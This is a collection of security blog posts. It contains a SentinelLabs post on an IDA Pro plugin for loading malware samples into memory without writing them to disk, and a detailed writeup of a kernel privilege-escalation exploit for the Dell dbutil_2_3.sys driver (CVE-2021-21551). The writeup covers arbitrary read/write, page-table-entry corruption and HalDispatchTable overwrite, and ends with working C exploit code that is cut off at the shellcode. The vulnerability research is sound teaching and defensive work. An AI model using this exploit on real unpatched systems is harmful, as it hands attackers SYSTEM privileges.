For now, I don’t have a timeline for the release of any of those projects, or for the next blog post I will write, but hopefully it won’t be as long as it took to get this one out ;)

Thank you for reading!

Keep Malware Off Your Disk With SentinelOne’s IDA Pro Memory Loader Plugin

SentinelLabs

Roman Rusetsky

25 March 2021 at 11:26

Recent events have highlighted the fact that security researchers are high value targets for threat actors, and given that we deal with malware samples day in and day out, the possibility of either an accidental or intentional compromise is something we all have to take extra precautions to prevent.

Most security researchers will have some kind of AV installed such that downloading a malicious file should trigger a static detection when it is written to disk, but that raises two problems. If the researcher is actively investigating a sample and the AV throws a static detection, this can hamper the very work the researcher is employed to do. Second, it’s good practice not to put known malicious files on your PC: you just might execute them by mistake and/or make your machine “dirty” (in terms of IOCs found on your machine).

One solution to this problem would be to avoid writing samples to disk. As malware reverse engineers, we have to load malware, shellcode and assorted binaries into IDA on a daily basis. After a suggestion from our team member Kasif Dekel, we decided to tackle this problem by creating an IDA plugin that loads a binary into IDA without writing it to disk. We have made this plugin publicly available for other researchers to use. In this post, we’ll describe our Memory Loader plugin’s features, installation and usage.

Memory Loader Plugin

If you have not used IDA Pro plugins before, a plugin basically takes IDA Pro database functionality and extends it. For example, a plugin can take all function entry points and mark them in the graph in red, making it easier to spot them. The plugin feature runs after the IDA database is initialized, meaning there is already a binary loaded into the database. A loader loads a binary into the IDA database.

Our Memory Loader plugin offers several advanced features to the malware analyst. These include loading files from a memory buffer (any source), loading files from zip files (encrypted/unencrypted), and loading files from a URL. Let’s take a look at each in turn.

Loading Files From a Memory Buffer

This plugin offers a library called Memory Loader that anyone can use to extend further the loading capability of IDA Pro to load files from a memory buffer from any source.

MemoryLoader is the base memory loader, a DLL executable, where the memory loading capabilities are stored. Its main functionally is to take a buffer of bytes from a memory buffer and load it into IDA with the appropriate loading scheme.

You will then have an IDA database file and be able to reverse engineer the file just as if it were loaded from the disk but without the attendant risks that come with saving malware to your local drive.

After you’ve analyzed the binary, save your work and close IDA Pro. The temporary IDA db files will be deleted and you will be left with your IDA database file and no binary on the disk.

Loading Files From a Zip/Encrypted Zip

MemZipLoader is able to load both encrypted and plain ZIP files into memory without writing the file to the disk. The loader accepts specific zip format files (.zip). After accepting a zip file, it will display the zip files and allow you to choose the file you want to work with.

MemZipLoader will extract the file from the input ZIP into a memory buffer and load it into IDA without writing it to disk and storing the encrypted zip file on your drive.

Loading Files From a URL

UrlLoader makes loading a file from a URL very easy. The loader is always suggested for any file you open. After you select UrlLoader, you will be asked to enter a URL, and the file downloaded will be stored in a memory buffer.

You will be able to reverse engineer the file and make changes to the IDA database. After you close the IDA window, you will be left with only the database file.

Installation Guide (tested on IDA 7.5+)

Download zip with binaries from here.
Extract the zip files to a folder.
Place the loaders in the loaders directory of IDA.
1. 1. MemoryLoader.dll -> (C:\Program Files\IDA Pro 7.5)
  2. MemoryLoader64.dll -> (C:\Program Files\IDA Pro 7.5)

Place the memory loader DLL in the IDA directory folder.
1. MemZipLoader64.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
2. UrlLoader64.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
3. UrlLoader.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
4. MemZipLoader.dll -> (C:\Program Files\IDA Pro 7.5\loaders)

How to Use MemZipLoader & UrlLoader

You can load binaries with MemZipLoader and UrlLoader as follows:

MemZipLoader:

Open IDA and choose zip file.
IDA should automatically suggest the loader:
Once selected, a list of the files from the zip will be displayed:
IDA will then use the loader code and load it as if the binary was a local file on the system.

UrlLoader:

Open any file on your computer in a directory you have write privileges to.
The UrlLoader will suggest a file to open.
After you chose UrlLoader, you will be asked enter a URL:
The loader will browse to the network location you entered. Then IDA Pro will use the loader code and load the binary as if it was a local file.

Setting Up Visual Studio Development

In order to set up the plugin for Visual Studio development, follow these steps.

1. Open a DLL project in Visual Studio
2. An IDA loader has three key parts: the accept function, the load function and the loader definition block. Your dllmain file is the file where the loader definition will be.
3. accept_file – this function returns a boolean if the loader is relevant to the current binary that is being loaded into IDA. For example, if you are loading a PE, the build_loaders_list should return PE.dll as one of the loading options.

load_file – this function is responsible for loading a file into the database. For each loader this function acts differently, so there is not much to say here. Documentation on loaders can be found here.

The project can be compiled into two versions x64 for IDA with x64 addresses, and x64 for IDA x64 with 32 bit addresses. From this point forward we will mark them:
1. X64 | X64 – 64 bit IDA with 64 BIT addresses
2. X32 | X64 – 64 bit IDA with 32 BIT addresses

Target file name (Configuration Properties -> Target Name)
1. X64 | X64 – $(ProjectName)64
2. X32 | X64 – $(ProjectName)
Include header files: (Similar in: (X64 | x64) and( X64 | X32)
1. Configuration Properties -> C/C++ -> Additional Include Directories – should point to the location of your IDA PRO SDK.
2. Set Runtime Library -> Multi-threaded Debug (/MTd)
Include lib files:
1. X64 | X64
  1. idasdk75\lib\x64_win_vc_64
X64 | X32
1. idasdk75\lib\x64_win_vc_32
2. idasdk75\lib\x64_win_vc_64
Preprocessor Definitions (Configuration Properties -> C/C++ -> Preprocessor Definitions):
1. X64 | X64 add: __EA64__
2. X32 | X64 add: __X64__, __NT__
Preprocessor Definitions (Configuration Properties -> C/C++ -> Undefined Preprocessor Definitions):
1. X32 | X64: __EA64__
Conclusion

When downloading malware to analyze from repositories like VirusTotal, the sample is usually zipped so that the endpoint security doesn’t detect it as malicious. Using our Memory Loader plugin will enable you to reverse engineer malicious binaries without writing them to the disk.

Using the Memory Loader plugin also saves you time analyzing binaries. When working with malicious content in IDA Pro often a different environment is created for it, usually in a virtual machine. Copying the binary and setting up the machine for research every time you want to open IDA is time-expensive. The Memory Loader plugin will allow you to work from your machine in a safer and more productive way.

Please note that a IDA professional license is needed to use and develop extensions for IDA Pro.

The SentinelOne IDA Pro Memory Loader Plugin is available on Github.

The post Keep Malware Off Your Disk With SentinelOne’s IDA Pro Memory Loader Plugin appeared first on SentinelLabs.

Exploit Development: CVE-2021-21551 - Dell ‘dbutil_2_3.sys’ Kernel Exploit Writeup

Connor McGarr

16 May 2021 at 00:00

Introduction

Recently I said I was going to focus on browser exploitation with Advanced Windows Exploitation being canceled. With this cancellation, I found myself craving a binary exploitation training, with AWE now being canceled for the previous two years. I found myself enrolled in HackSysTeam’s Windows Kernel Exploitation Advanced course, which will be taking place at the end of this month at CanSecWest, due to the cancellation. I have already delved into the basics of kernel exploitation, and I had been looking to complete a few exercises to prepare for the end of the month, and shake the rust off.

I stumbled across this SentinelOne blog post the other day, which outlined a few vulnerabilities in Dell’s dbutil_2_3.sys driver, including a memory corruption vulnerability. Although this vulnerability was attributed to Kasif Dekel, it apparently was discovered earlier by Yarden Shafir and Staoshi Tanda, coworkers of mine at CrowdStrike.

After reading Kasif’s blog post, which practically outlines the entire vulnerability and does an awesome job of explaining things and giving researchers a wonderful starting point, I decided that I would use this opportunity to get ready for Windows Kernel Exploitation Advanced at the end of the month.

I also decided, because Kasif leverages a data-only attack, instead of something like corrupting page table entries, that I would try to recreate this exploit by achieving a full SYSTEM shell via page table corruption. The final result ended up being a weaponized exploit. I wanted to take this blog post to showcase just a few of the “checks” that needed to be bypassed in the kernel in order to reach the final arbitrary read/write primitive, as well as why modern mitigations such as Virtualization-Based Security (VBS) and Hypervisor-Protected Code Integrity (HVCI) are so important in today’s threat landscape.

In addition, three of my favorite things to do are to write, conduct vulnerability research, and write code - so regardless of if you find this blog helpful/redundant, I just love to write blogs at the end of the day :-). I also hope this blog outlines, as I mentioned earlier, why it is important mitigations like VBS/HVCI become more mainstream and that at the end of the day, these two mitigations in tandem could have prevented this specific method of exploitation (note that other methods are still viable, such as a data-only attack as Kasif points out).

Arbitrary Write Primitive

I will not attempt to reinvent the wheel here, as Kasif’s blog post explains very well how this vulnerability arises, but the tl;dr on the vulnerability is there is an IOCTL code that any client can trigger with a call to DeviceIoControl that eventually reaches a memmove routine, in which the user-supplied buffer from the vulnerable IOCTL routine is used in this call.

Let’s get started with the analysis. As is accustom in kernel exploits, we first need a way, generally speaking, to interact with the driver. As such, the first step is to obtain a handle to the driver. Why is this? The driver is an object in kernel mode, and as we are in user mode, we need some intermediary way to interact with the driver. In order to do this, we need to look at how the DEVICE_OBJECT is created. A DEVICE_OBJECT generally has a symbolic link which references it, that allows clients to interact with the driver. This object is what clients interact with. We can use IDA in our case to locate the name of the symbolic link. The DriverEntry function is like a main() function in a kernel mode driver. Additionally, DriverEntry functions are prototyped to accept a pointer to a DRIVER_OBJECT, which is essentially a “representation” of a driver, and a RegistryPath. Looking at Microsoft documentation of a DRIVER_OBJECT, we can see one of the members of this structure is a pointer to a DEVICE_OBJECT.

Loading the driver in IDA, in the Functions window under Function name, you will see a function called DriverEntry.

This entry point function, as we can see, performs a jump to another function, sub_11008. Let’s examine this function in IDA.

As we can see, the \Device\DBUtil_2_3 string is used in the call to IoCreateDevice to create a DEVICE_OBJECT. For our purposes, the target symbolic link, since we are a user-mode client, will be \\\\.\\DBUtil_2_3.

Now that we know what the target symbolic link is, we then need to leverage CreateFile to obtain a handle to this driver.

We will start piecing the code together shortly, but this is how we obtain a handle to interact with the driver.

The next function we need to call is DeviceIoControl. This function will allow us to pass the handle to the driver as an argument, and allow us to send data to the driver. However, we know that drivers create I/O Control (IOCTL) routines that, based on client input, perform different actions. In this case, this driver exposes many IOCTL routines. One way to determine if a function in IDA contains IOCTL routines, although it isn’t fool proof, is looking for many branches of code with cmp eax, DWORD. IOCTL codes are DWORDs and drivers, especially enterprise grade drivers, will perform many different actions based on the IOCTL specified by the client. Since this driver doesn’t contain many functions, it is relatively trivial to locate a function which performs many of these validations.

Per Kasif’s research, the vulnerable IOCTL in this case is 0x9B0C1EC8. In this function, sub_11170, we can look for a cmp eax, 9B0C1EC8h instruction, which would be indicative that if the vulnerable IOCTL code is specified, whatever code branches out from that compare statement would lead us to the vulnerable code path.

This compare, if successful, jumps to an xor edx, edx instruction.

After the XOR instruction incurs, program execution hits the loc_113A2 routine, which performs a call to the function sub_15294.

If you recall from Kasif’s blog post, this is the function in which the vulnerable code resides in. We can see this in the function, by the call to memmove.

What primitive do we have here? As Kasif points out, we “can control the arguments to memmove” in this function. We know that we can hit this function, sub_15294, which contains the call to memmove. Let’s take a look at the prototype for memmove, as seen here.

As seen above, memmove allows you to move a pointer to a block of memory into another pointer to a block of memory. If we can control the arguments to memmove, this gives us a vanilla arbitrary write primitive. We will be able to overwrite any pointer in kernel mode with our own user-supplied buffer! This is great - but the question remains, we see there are tons of code branches in this driver. We need to make sure that from the time our IOCTL code is checked and we are directed towards our code path, that any compare statements/etc. that arise are successfully dealt with, so we can reach the final memmove routine. Let’s begin by sending an arbitrary QWORD to kernel mode.

After loading the driver on the debuggee machine, we can start a kernel-mode debugging session in WinDbg. After verifying the driver is loaded, we can use IDA to locate the offset to this function and then set a breakpoint on it.

Next, after running the POC on the debuggee machine, we can see execution hits the breakpoint successfully and the target instruction is currently in RIP and our target IOCTL is in the lower 32-bits of RAX, EAX.

After executing the cmp statement and the jump, we can see now that we have landed on the XOR instruction, per our static analysis with IDA earlier.

Then, execution hits the call to the function (sub+15294) which contains the memmove routine - so far so good!

We can see now we have landed inside of the function call, and a new stack frame is being created.

If we look in the RCX register currently, we can see our buffer, when dereferencing the value in RCX.

We then can see that, after stepping through the sup rsp, 0x40 stack allocation and the mov rbx, rcx instruction, the value 0x8 is going to be placed into ECX and used for the cmp ecx, 0x18 instruction.

What is this number? This is actually the size of our buffer, which is currently one QWORD. Obviously this compare statement will fail, and essentially an NTSTATUS code is returned back to the client of 0xC0000000D, which means STATUS_INVALID_PARAMETER. This is the driver’s way to let the client know one of the needed arguments wasn’t correct in the IOCTL call. This means that if we want to reach the memmove routine, we will at least need to send 0x18 bytes worth of data.

Refactoring our code, let’s try to send a contiguous buffer of 0x18 bytes of data.

After hitting the sub_5294 function, we see that this time the cmp ecx, 0x18 check will be bypassed.

After stepping through a few instructions, after the test rax, rax bitwise test and the jump instruction, we land on a load effective address instruction, and we can see our call to memmove, although there is no symbol in WinDbg.

Since we are about to hit the call to memmove, we know that the __fastcall calling convention is in use, as we see no movements to the stack and we are on a 64-bit system. Because of this, we know that, based on the prototype, the first argument will be placed into RCX, which will be the destination buffer (e.g. where the memory will be written to). We also know that RDX will contain the source buffer (e.g. where the memory comes from).

Stepping into the mov ecx, dword ptr[rsp+0x30], which will move the lower 32-bits of RSP, ESP, into ECX, we can see that a value of 0x00000000 is about to be moved into ECX.

We then see that the value on the stack, at an offset of 0x28, is added to the value in RCX, which is currently zero.

We then can see that invalid memory will be dereferenced in the call to memmove.

Why is this? Recall the prototype of memmove. This function accepts a pointer to memory. Since we passed raw values of junk, these addresses are invalid. Because of this, let’s switch up our POC a bit again in order to see if we can’t get a desired result. Let’s use KUSER_SHARD_DATA at an offset of 0x800, which is 0xFFFFF78000000800, as a proof of concept.

This time, per Kasif’s research, we will send a 0x20 byte buffer. Kasif points out that the memmove routine, before reaching the call, will select at an offset of 0x8 (the destination) and 0x18 (the source).

After re-executing the POC, let’s jump back right before the call to memmove.

We can see that this time, 0x42 bytes, 4 bytes of them to be exact, will be loaded into ECX.

Then, we can clearly see that the value at the stack, plus 0x28 bytes, will be added to ECX. The final result is 0xFFFFF78042424242.

We then can see that before the call, another part of our buffer is moved into RDX as the source buffer. This allows us an arbitrary write primitive! A buffer we control will overwrite the pointer at the memory address we supply.

The issue is, however, with the source address. We were attempting to target 0xFFFFF78000000800. However, our address got mangled into 0xFFFFF78042424242. This is because it seems like the lower 32-bits of one of our user-supplied QWORDS first gets added to the destination buffer. This time, if we resend the exploit and we change where 0x4242424242424242 once was with 0x0000000000000000, we can “bypass” this issue, but having a value of 0 added, meaning our target address will remain unmangled.

After sending the POC again, we can see that the correct target address is loaded into RCX.

Then, as expected, our arguments are supplied properly to the call to memmove.

After stepping over the function call, we can see that our arbitrary write primitive has successfully worked!

Again, thank you to Kasif for his research on this! Now, let’s talk about the arbitrary read primitive, which is very similar!

Arbitrary Read Primitive

As we know, whenever we supply arguments to the vulnerable memmove routine used for an arbitrary write primitive, we can supply the “what” (our data) and the “where” (where do we write the data). However, recall the image two images above, showcasing our successful arguments, that since memmove accepts two pointers, the argument in RDX, which is a pointer to 0x4343434343434343, is a kernel mode address. This means, at some point between the memmove call and our invocation of DeviceIoControl, our array of QWORDS was transferred to kernel mode, so it could be used by the driver in the call to memmove. Notice, however, that the target address, the value in RCX, is completely controllable by us - meaning the driver doesn’t create a pointer to that QWORD, we can directly supply it. And, since memmove will interpret that as a pointer, we can actually overwrite whatever we pass to the target buffer, which in this case is any address we want to corrupt.

What if, however, there was a way to do this in reverse? What if, in place of the kernel mode address that points to 0x4343434343434343 we could just supply our own memory address, instead of the driver creating a pointer to it, identically to how we control the target address we want to move memory to.

This means, instead of having something like this for the target address:

ffffc605`24e82998 43434343`43434343

What if we could just pass our own data as such:

43434343`43434343 DATA

Where 0x4343434343434343 is a value we supply, instead of having the kernel create a pointer to it for us. That way, when memmove interprets this address, it will interpret it as a pointer. This means that if we supply a memory address, whatever that memory address points to (e.g. nt!MiGetPteAddress+0x13 when dereferenced) is copied to the target buffer!

This could go one of two ways potentially: option one would be that we could copy this data into our own pointer in C. However, since we see that none of our user-mode addresses are making it to the driver, and the driver is taking our buffer and placing it in kernel mode before leveraging it, the better option, perhaps, would be to supply an output buffer to DeviceIoControl and see if the memmmove data writes it to the output buffer.

The latter option makes sense as this IOCTL allows any client to supply a buffer and have it copied. This driver most likely isn’t expecting unauthorized clients to this IOCTL, meaning the input and output buffers are most likely being used by other kernel mode components/legitimate user-mode clients that need an easy way to pass and receive data. Because of this, it is more than likely it is expected behavior for the output buffer to contain memmove data. The problem is we need to find another memmove routine that allows us to essentially to the inverse of what we did with the arbitrary write primitive.

Talking to a peer of mine, VoidSec about my thought process, he pointed me towards Metasploit, which already has this concept outlined in their POC.

Doing a bit more of reverse engineering, we can see that there is more than one way to reach the arbitrary write memmove routine.

Looking into the sub_15294, we can see that this is the same memmove routine leveraged before.

However, since there is another IOCTL routine that invokes this memmove routine, this is a prime candidate to see if anything about this routine is different (e.g. why create another routine to do the same thing twice? Perhaps this routine is used for something else, like reading memory or copying memory in a different way). Additionally, recall when we performed an arbitrary write, the routines were indexing our buffer at 0x8 and 0x18. This could mean that the call to memmove, via the new IOCTL, could setup our buffer in a way that the buffer is indexed at a different offset, meaning we may be able to achieve an arbitrary read.

It is possible to reach this routine through the IOCTL 0x9B0C1EC4.

Let’s update our POC to attempt to trigger the new IOCTL and see if anything is returned in the output buffer. Essentially, we will set the second value, similar to last time, of our QWORD array to the value we want to interact with, in this case, read, and set everything else to 0. Then, we will reuse the same array of QWORDS as an output buffer and see if anything was written to the buffer.

We can use IDA to identify the proper offset within the driver that the cmp eax, 0x9B0C1EC4 lands on, which is sub_11170+75.

We know that the first IOCTL code we will hit is the arbitrary write IOCTL, so we can pass over the first compare and then hit the second.

We then can see execution reaches the function housing the memmove routine, sub_15294.

After stepping through a few instruction, we can see our input buffer for the read primitive is being propagated and setup for the future call to memmove.

Then, the first part of the buffer is moved into RAX.

Then, the target address we would like to dereference and read from is loaded into RAX.

Then, the target address of KUSER_SHARED_DATA is loaded into RCX and then, as we can see, it will be loaded into RDX. This is great for us, as it means the 2nd argument for a function call on 64-bit systems on Windows is loaded into RDX. Since memmove accepts a pointer to a memory address, this means that this address will be the address that is dereferenced and then has its memory copied into a target buffer (which hopefully is returned in the output buffer parameter of DeviceIoControl).

Recall in our arbitrary write routine that the second parameter, 4343434343434343 was pointed to by a kernel mode address. Look at the above image and see now that we control the address (0xFFFFF78000000000), but this time this address will be dereferenced and whatever this address points to will be written to the buffer pointed to by RCX. Since in our last routine we controlled both arguments to memmove, we can expect that, although the value in RCX is in kernel mode, it will be bubbled back up into user mode and will be placed in our output buffer! We can see just before the return from memmove, the return value is the buffer in which the data was copied into, and we can see the buffer contains 0x0fa0000000000000! Looking in the debugger, this is the value KUSER_SHARED_DATA points to.

We really don’t need to do any more debugging/reverse engineering as we know that we completely control these arguments, based on our write primitive. Pressing g in the debugger, we can see that in our POC console, we have successfully performed an arbitrary read!

We indexed each array element of the QWORD array we sent, per our code, and we can see the last element will contain the dereferenced contents of the value we would like to read from! Now that we have a vanilla 1 QWORD arbitrary read/write primitive, we can now get into out exploitation path.

Why Perform a Data-Only Attack When You Can Corrupt All Of The Memory and Deal With All of the Mitigations? Let’s Have Some Fun And Make Life Artificially Harder On Ourselves!

First, please note I have more in-depth posts on leveraging page table entries and memory paging for kernel exploitation found here and here.

Our goal with this exploitation path will be the following:

Write our shellcode somewhere that is writable in the driver’s virtual address space
Locate the base of the page table entries
Calculate where the page table entry for the memory page where our shellcode lives
Corrupt the page table entry to make the shellcode page RWX, circumventing SMEP and bypassing kernel no-eXecute (DEP)
Overwrite nt!HalDispatchTable+0x8 and circumvent kCFG (kernel Control-Flow Guard) (Note that if kCFG was fully enabled, then VBS/HVCI would then be enabled - rendering this technique useless. kCFG does still have some functionality, even when VBS/HVCI is disabled, like performing bitwise tests to ensure user mode addresses aren’t called from kernel mode. This simply just “circumvents” kCFG by calling a pointer to our shellcode, which exists in kernel mode from the first step).

First we need to find a place in kernel mode that we can write our shellcode to. KUSER_SHARED_DATA is a perfectly fine solution, but there is also a good candidate within the driver itself, located in its .data section, which is already writable.

We can see that from the above image, we have a ton of room to work with, in terms of kernel mode writable memory. Our shellcode is approximately 9 QWORDS, so we will have more than enough room to place our shellcode here.

We will start our shellcode out at .data+0x10. Since we know where the shellcode will go, and since we know it resides in the dbutil_2_3.sys driver, we need to add a routine to our exploit that can retrieve the load address of the kernel, for PTE indexing calculations, and the base address of the driver.

Note that this assumes the process invoking this exploit is that of medium integrity.

The next step, since we know where we want to write to is at an offset of 0x3000 (offset to .data.) + 0x10 (offset to code cave) from the base address of dbutil_2_3.sys, is to locate the page table entry for this memory address, which already is a kernel-mode page and is writable (you could use KUSER_SHARED_DATA+0x800). In order to perform the calculations to locate the page table entry, we first need to bypass page table randomization, a mitigation of Windows 10 after 1607.

This is because we need the base of the page table entries in order to locate the PTE for a specific page in memory (the page table entries are an array of virtual addresses in this case). The Windows API function nt!MiGetPteAddress, at an offset of 0x13, contains, dynamically, the base of the page table entries as this kernel mode function is leveraged to find the base of the page table entries.

Let’s use our read primitive to locate the base of the page table entries (note that I used a static offset from the base of the kernel to nt!MiGetPteAddress, mostly because I am focused on the exploitation phase of this CVE, and not making this exploit portable. You’ll need to update this based on your patch level).

Here we can see we obtain the initial handle to the driver, create a buffer based on our read primitive, send it to the driver, and obtain the base of the page table entries. Then, we programmatically can replicate what nt!MiGetPteAddress does in order to fetch the correct page table entry in the array for the page we will be writing our shellcode to.

Now that we have calculated the page table entry for where our shellcode will be written to, let’s now dereference it in order to preserve what the PTE bits contain, in terms of permissions, so we can modify this value later

Checking in WinDbg, we can also see this is the case!

Now that we have the virtual address for our page table entry and we have extracted the current bits that comprise the entry, let’s write our shellcode to .data+0x10 (dbutil_2_3+0x3010).

After execution of the updated POC, we can clearly see that the arbitrary write routines worked, and our shellcode is located in kernel mode!

Perfect! Now that we have our shellcode in kernel mode, we need to make it executable. After all, the .data section of a PE or driver is read/write. We need to make this an executable region of memory. Since we have the PTE bits already stored, we can update our page table entry bits, stored in our exploit, to contain the bits with the no-eXecute bit cleared, and leverage our arbitrary write primitive to corrupt the page table entry and make it read/write/execute (RWX)!

Perfect! Now that we have made our memory region executable, we need to overwrite the pointer to nt!HalDispatchTable+0x8 with this memory address. Then, when we invoke ntdll!NtQueryIntervalProfile from user mode, which will trigger a call to this QWORD! However, before overwriting nt!HalDispatchTable+0x8, let’s first use our read primitive to preserve the current pointer, so we can put it back after executing our shellcode to ensure system stability, as the Hardware Abstraction Layer is very important on Windows and the dispatch table is referenced regularly.

After preserving the pointer located at nt!HalDispatchTable+0x8 we can use our write primitive to overwrite nt!HalDispatchTable+0x8 with a pointer to our shellcode, which resides in kernel mode memory!

Perfect! At this point, if we invoke nt!HalDispatchTable+0x8’s pointer, we will be calling our shellcode! The last step here, besides restoring everything, is to resolve ntdll!NtQueryIntervalProfile, which eventually performs a call to [nt!HalDispatchTable+0x8].

Then, we can finish up our exploit by adding in the restoration routine to restore nt!HalDispatchTable+0x8.

Let’s set a breakpoint on nt!NtQueryIntervalProfile, which will be called, even though the call originates from ntdll.dll.

After hitting the breakpoint, let’s continue to step through the function until we hit the call nt!KeQueryIntervalProfile function call, and let’s use t to step into it.

Stepping through approximately 9 instructions inside of ntKeQueryIntervalProfile, we can see that we are not directly calling [nt!HalDispatchTable+0x8], but we are calling nt!guard_dispatch_icall. This is part of kCFG, or kernel Control-Flow Guard, which validates indirect function calls (e.g. calling a function pointer).

Clearly, as we can see, the value of [nt!HalDispatchTable+0x8] is pointing to our shellcode, meaning that kCFG should block this. However, kCFG actually requires Virtualization-Based Security (VBS) to be fully implemented. We can see though that kCFG has some functionality in kernel mode, even if it isn’t implemented full scale. The routines still exist in the kernel, which would normally check a bitmap of all indirect function calls and determine if the value that is about to be placed into RAX in the above image is a “valid target”, meaning at compile time, when the bitmap was created, did the address exist and is it apart of any valid control-flow transfer.

However, since VBS is not mainstream yet, requires specific hardware, and because this exploit is being developed in a virtual machine, we can disregard the VBS side for now (note that this is why mitigations like VBS/HVCI/HyperGuard/etc. are important, as they do a great job of thwarting these types of memory corruption vulnerabilities).

Stepping through the call to nt!guard_dispatch_icall, we can actually see that all this routine does essentially, since VBS isn’t enabled, is bitwise test the target address in RAX to confirm it isn’t a user-mode address (basically it checks to see if it is sign-extended). If it is a user-mode address, you’ll actually get a bug check and BSOD. This is why I opted to keep our shellcode in kernel mode, so we can pass this bitwise test!

Then, after stepping through everything, we can see now that control-flow transfer has been handed off to our shellcode.

From here, we can see we have successfully obtained NT AUTHORITY\SYSTEM privileges!

“When Napoleon lay at Boulogne for a year with his flat-bottom boats and his Grand Army, he was told by someone ‘There are bitter weeds in VBS/HVCI/kCFG’”

Although this exploit was arduous to create, we can clearly see why data-only attacks, such as the _SEP_TOKEN_PRIVILEGES method outlined by Kasif are optimal. They bypass pretty much any memory corruption related mitigation.

Note that VBS/HVCI actually creates an additional security boundary for us. Page table entries, when VBS is enabled, are actually managed by a higher security boundary, virtual trust level 1 - which is the secure kernel. This means it is not possible to perform PTE manipulation as we did. Additionally, even if this were possible, HVCI is essentially Arbitrary Code Guard (ACG) in the kernel - meaning that it also isn’t possible to manipulate the permissions of memory as we did. These two mitigations would also allow kCFG to be fully implemented, meaning our control-flow transfer would have also failed.

The advisory and patch for this vulnerability can be found here! Please patch your systems or simply remove the driver.

Thank you again to Kasif for this original research! This was certainly a fun exercise :-). Until next time - peace, love, and positivity :-).

Here is the final POC, which can be found on my GitHub:

// CVE-2021-21551: Dell 'dbutil_2_3.sys' Memory Corruption
// Original research: https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/
// Author: Connor McGarr (@33y0re)

#include <stdio.h>
#include <Windows.h>
#include <Psapi.h>

// Vulnerable IOCTL
#define IOCTL_WRITE_CODE 0x9B0C1EC8
#define IOCTL_READ_CODE 0x9B0C1EC4

// Prepping call to nt!NtQueryIntervalProfile
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);

// Obtain the kernel base and driver base
unsigned long long kernelBase(char name[])
{
  // Defining EnumDeviceDrivers() and GetDeviceDriverBaseNameA() parameters
  LPVOID lpImageBase[1024];
  DWORD lpcbNeeded;
  int drivers;
  char lpFileName[1024];
  unsigned long long imageBase;

  BOOL baseofDrivers = EnumDeviceDrivers(
    lpImageBase,
    sizeof(lpImageBase),
    &lpcbNeeded
  );

  // Error handling
  if (!baseofDrivers)
  {
    printf("[-] Error! Unable to invoke EnumDeviceDrivers(). Error: %d\n", GetLastError());
    exit(1);
  }

  // Defining number of drivers for GetDeviceDriverBaseNameA()
  drivers = lpcbNeeded / sizeof(lpImageBase[0]);

  // Parsing loaded drivers
  for (int i = 0; i < drivers; i++)
  {
    GetDeviceDriverBaseNameA(
      lpImageBase[i],
      lpFileName,
      sizeof(lpFileName) / sizeof(char)
    );

    // Keep looping, until found, to find user supplied driver base address
    if (!strcmp(name, lpFileName))
    {
      imageBase = (unsigned long long)lpImageBase[i];

      // Exit loop
      break;
    }
  }

  return imageBase;
}


void exploitWork(void)
{
  // Store the base of the kernel
  unsigned long long baseofKernel = kernelBase("ntoskrnl.exe");

  // Storing the base of the driver
  unsigned long long driverBase = kernelBase("dbutil_2_3.sys");

  // Print updates
  printf("[+] Base address of ntoskrnl.exe: 0x%llx\n", baseofKernel);
  printf("[+] Base address of dbutil_2_3.sys: 0x%llx\n", driverBase);

  // Store nt!MiGetPteAddress+0x13
  unsigned long long ntmigetpteAddress = baseofKernel + 0xbafbb;

  // Obtain a handle to the driver
  HANDLE driverHandle = CreateFileA(
    "\\\\.\\DBUtil_2_3",
    FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE,
    0x0,
    NULL,
    OPEN_EXISTING,
    0x0,
    NULL
  );

  // Error handling
  if (driverHandle == INVALID_HANDLE_VALUE)
  {
    printf("[-] Error! Unable to obtain a handle to the driver. Error: 0x%lx\n", GetLastError());
    exit(-1);
  }
  else
  {
    printf("[+] Successfully obtained a handle to the driver. Handle value: 0x%llx\n", (unsigned long long)driverHandle);

    // Buffer to send to the driver (read primitive)
    unsigned long long inBuf1[4];

    // Values to send
    unsigned long long one1 = 0x4141414141414141;
    unsigned long long two1 = ntmigetpteAddress;
    unsigned long long three1 = 0x0000000000000000;
    unsigned long long four1 = 0x0000000000000000;

    // Assign the values
    inBuf1[0] = one1;
    inBuf1[1] = two1;
    inBuf1[2] = three1;
    inBuf1[3] = four1;

    // Interact with the driver
    DWORD bytesReturned1 = 0;

    BOOL interact = DeviceIoControl(
      driverHandle,
      IOCTL_READ_CODE,
      &inBuf1,
      sizeof(inBuf1),
      &inBuf1,
      sizeof(inBuf1),
      &bytesReturned1,
      NULL
    );

    // Error handling
    if (!interact)
    {
      printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
      exit(-1);
    }
    else
    {
      // Last member of read array should contain base of the PTEs
      unsigned long long pteBase = inBuf1[3];

      printf("[+] Base of the PTEs: 0x%llx\n", pteBase);

      // .data section of dbutil_2_3.sys contains a code cave
      unsigned long long shellcodeLocation = driverBase + 0x3010;

      // Bitwise operations to locate PTE of shellcode page
      unsigned long long shellcodePte = (unsigned long long)shellcodeLocation >> 9;
      shellcodePte = shellcodePte & 0x7FFFFFFFF8;
      shellcodePte = shellcodePte + pteBase;

      // Print update
      printf("[+] PTE of the .data page the shellcode is located at in dbutil_2_3.sys: 0x%llx\n", shellcodePte);

      // Buffer to send to the driver (read primitive)
      unsigned long long inBuf2[4];

      // Values to send
      unsigned long long one2 = 0x4141414141414141;
      unsigned long long two2 = shellcodePte;
      unsigned long long three2 = 0x0000000000000000;
      unsigned long long four2 = 0x0000000000000000;

      inBuf2[0] = one2;
      inBuf2[1] = two2;
      inBuf2[2] = three2;
      inBuf2[3] = four2;

      // Parameter for DeviceIoControl
      DWORD bytesReturned2 = 0;

      BOOL interact1 = DeviceIoControl(
        driverHandle,
        IOCTL_READ_CODE,
        &inBuf2,
        sizeof(inBuf2),
        &inBuf2,
        sizeof(inBuf2),
        &bytesReturned2,
        NULL
      );

      // Error handling
      if (!interact1)
      {
        printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
        exit(-1);
      }
      else
      {
        // Last member of read array should contain PTE bits
        unsigned long long pteBits = inBuf2[3];

        printf("[+] PTE bits for the shellcode page: %p\n", pteBits);

        /*
          ; Windows 10 1903 x64 Token Stealing Payload
          ; Author Connor McGarr

          [BITS 64]

          _start:
